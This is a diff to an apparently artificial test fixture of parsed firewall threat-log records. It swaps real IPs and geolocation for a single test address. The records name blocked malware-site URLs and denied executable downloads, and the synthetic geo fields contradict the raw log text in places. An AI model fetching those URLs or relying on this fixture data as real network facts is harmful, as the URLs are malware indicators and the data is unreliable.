"2012-10-30T09:57:38.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -7272,26 +7257,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -7307,7 +7291,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7348,7 +7332,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=", + "community_id": "1:G7F7gp4Vd2RQ5kRfwVmq8efOZL0=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -7384,14 +7368,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545700774Z", - "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079309100Z", + "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:52.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -7414,26 +7398,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -7449,7 +7432,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7490,7 +7473,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=", + "community_id": "1:G7F7gp4Vd2RQ5kRfwVmq8efOZL0=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -7526,14 +7509,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545708560Z", - "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079313100Z", + "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:52.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -7570,28 +7553,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Brea", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -117.8854, - "lat": 33.9339 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 26347, + "number": 4837, "organization": { - "name": "New Dream Network, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "173.236.179.57" + "ip": "175.16.199.1" }, - "message": "173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7632,7 +7614,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:to6WA2KM9vqO74DfMPJ8+v0cKPs=", + "community_id": "1:dd+2RtCBMUfATx7W9zSc0ZBYnK0=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
@@ -7667,15 +7649,15 @@ "crusher" ], "ip": [ - "173.236.179.57", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545715753Z", - "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079316600Z", + "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -7698,26 +7680,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -7733,7 +7714,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7774,7 +7755,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=", + "community_id": "1:G7F7gp4Vd2RQ5kRfwVmq8efOZL0=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -7810,14 +7791,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545722883Z", - "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079321700Z", + "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -7854,28 +7835,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "CA-QC", - "city_name": "Montreal", - "country_iso_code": "CA", - "country_name": "Canada", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "European Union", - "region_name": "Quebec", + "region_name": "Jilin", "location": { - "lon": -73.5848, - "lat": 45.4995 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 9009, + "number": 4837, "organization": { - "name": "M247 Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "91.209.163.202" + "ip": "175.16.199.1" }, - "message": "91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -7916,7 +7896,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:dHpseryW+AZk/t5IUvlyhaLSGI0=", + "community_id": "1:hh9v5OE+zszAvwG3xMpfjtFz8B0=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
@@ -7951,15 +7931,15 @@ "crusher" ], "ip": [ - "91.209.163.202", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545729995Z", - "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079327600Z", + "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -7997,26 +7977,26 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-ZJ", + "region_iso_code": "CN-JL", "country_iso_code": "CN", "country_name": "China", "name": "China", - "region_name": "Zhejiang", + "region_name": "Jilin", "location": { - "lon": 120.1619, - "lat": 30.294 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 4134, + "number": 4837, "organization": { - "name": "No.31,Jin-rong Street" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "122.226.169.183" + "ip": "175.16.199.1" }, - "message": "122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8057,7 +8037,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:lIp7rPLlF21gCwZ63WafZ2HbNKA=", + "community_id": "1:vpiRKKCil4wbkrh++9kb1un4Ymo=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
@@ -8092,15 +8072,15 @@ "crusher" ], "ip": [ - "122.226.169.183", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545737028Z", - "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079333400Z", + "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -8123,26 +8103,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -8158,7 +8137,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8199,7 +8178,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:n39Q6RPkLwPiDU/pfHT7uRZGkXY=", + "community_id": "1:6b7FIfvAunGzr85o0MLQFvp0BQM=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -8235,14 +8214,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545744237Z", - "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079339200Z", + "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -8279,25 +8258,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Netherlands", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Netherlands", + "region_name": "Jilin", "location": { - "lon": 4.8995, - "lat": 52.3824 - }, - "country_iso_code": "NL" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 43350, + "number": 4837, "organization": { - "name": "NForce Entertainment B.V." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "109.201.131.15" + "ip": "175.16.199.1" }, - "message": "109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8338,7 +8319,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:69YGwS9/vtp36Khj80nU/Q0TTfM=", + "community_id": "1:BQ/dUPZO8/mW0sp66fiTYAhPyE4=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
@@ -8373,15 +8354,15 @@ "crusher" ], "ip": [ - "109.201.131.15", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545751471Z", - "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079345100Z", + "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -8418,28 +8399,27 @@ "source": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "CA-QC", - "city_name": "Montreal", - "country_iso_code": "CA", - "country_name": "Canada", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "European Union", - "region_name": "Quebec", + "region_name": "Jilin", "location": { - "lon": -73.5848, - "lat": 45.4995 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 9009, + "number": 4837, "organization": { - "name": "M247 Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "91.209.163.202" + "ip": "175.16.199.1" }, - "message": "91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", + "message": "175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8480,7 +8460,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MKMWzixtfYaSoShU7T3wN6MLk5g=", + "community_id": "1:/mjoSXhsxmOmj+1KojpmihUMtnQ=", "transport": "tcp", "application": "web-browsing", "direction": "outbound" 
@@ -8515,15 +8495,15 @@ "crusher" ], "ip": [ - "91.209.163.202", + "175.16.199.1", "192.168.0.2", "0.0.0.0" ] }, "event": { "severity": 4, - "ingested": "2021-09-08T12:37:05.545758766Z", - "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", + "ingested": "2021-12-09T13:42:59.079350900Z", + "original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -8546,23 +8526,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 13238, + "number": 4837, "organization": { - "name": "YANDEX LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "213.180.199.61" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -8578,7 +8560,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,213.180.199.61,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,\"boialex.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,\"boialex.narod.ru/config.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -8619,7 +8601,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:J4hfLZVy8UJEkW68RkW2hMu84Wk=", + "community_id": "1:ZithDSqahEs9YBK9Uwr8ubWPM7w=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
